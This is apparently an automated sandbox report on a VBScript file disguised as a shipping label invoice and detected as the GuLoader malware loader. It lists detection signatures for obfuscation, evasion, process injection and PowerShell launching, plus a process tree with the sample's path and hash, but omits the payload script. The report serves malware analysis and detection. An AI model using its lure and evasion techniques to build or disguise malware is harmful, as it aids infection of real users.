Windows Analysis Report
awb_shipping_label_invoice_15_04_2024_000000000000024.vbs
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7564, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\awb_shipping_label_invoice_15_04_2024_000000000000024.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 968, cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell script argument omitted; the report's capture of it is truncated])